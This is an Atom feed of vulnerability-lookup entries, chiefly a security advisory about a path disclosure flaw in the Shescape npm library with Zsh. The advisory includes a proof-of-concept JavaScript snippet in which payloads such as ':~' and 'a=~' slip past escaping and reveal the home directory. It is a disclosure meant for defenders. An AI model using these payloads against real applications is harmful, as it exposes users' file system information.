<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T14:11:45.032791+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-351892</id>
    <title>EUVD-2026-351892</title>
    <updated>2026-10-06T14:11:45.081926+00:00</updated>
    <content>EUVD-2026-351892</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-351892"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-73412</id>
    <title>fkie_cve-2026-73412</title>
    <updated>2026-10-06T14:11:45.081971+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Shescape is a simple shell escape library for JavaScript. Prior to 2.1.14 and 3.0.1, this impacts users of Shescape on Unix systems that explicitly configure shell to Zsh, or true when the default shell is Zsh, using the escape and escapeAll. The Zsh options EXTENDED_GLOB and MAGIC_EQUAL_SUBST exacerbate the problem. In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information. This issue is fixed in versions 2.1.14 and 3.0.1.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-73412"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-6v4m-fw66-8r4x</id>
    <title>GHSA-6v4m-fw66-8r4x — Shescape: Path disclosure on Unix with Zsh</title>
    <updated>2026-10-06T14:11:45.082008+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> npm: shescape</p>
<p>### Impact</p>
<p>This impacts users of Shescape on Unix systems that explicitly configure `shell` to Zsh, or `true` when the default shell is Zsh, using the `escape` and `escapeAll`. The Zsh options `EXTENDED_GLOB` and `MAGIC_EQUAL_SUBST` exacerbate the problem.</p>
<p>In certain case, an attacker can leverage home directory expansion and extended glob syntax to obtain lists of files and directories on the system. Depending on what the command does, this may be used to leak more information.</p>
<p>#### Without option / with `MAGIC_EQUAL_SUBST`</p>
<p>```javascript
import * as cp from "node:child_process";
import { Shescape } from "shescape";</p>
<p>// 1. Prerequisites
const options = {
    shell: "zsh",
    // Or
    shell: true, // Only if the default shell is Zsh
};</p>
<p>// 2. Payload
const payload1 = ":~";
// Or
const payload2 = "a=~"; // requires MAGIC_EQUAL_SUBST</p>
<p>// 3. Usage
const shescape = new Shescape(options);
let escapedPayload;</p>
<p>escapedPayload = shescape.escape(payload1);
// Or
escapedPayload = shescape.escapeAll([payload1]);
// And (example)
const result1 = cp.execSync(`V=${escapedPayload}; echo $V`, options);</p>
<p>// Or
escapedPayload = shescape.escape(payload2);
// Or
escapedPayload = shescape.escapeAll([payload2]);
// And (example)
const result2 = cp.execSync(`echo ${escapedPayload}`, options);</p>
<p>// 4. Impact
console.log("", result1.toString().trim(), "\n", result2.toString().trim());
// Outputs ":" followed by the user's home directory on one line and "a="
// followed by the user's home directo…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-6v4m-fw66-8r4x"/>
  </entry>
</feed>
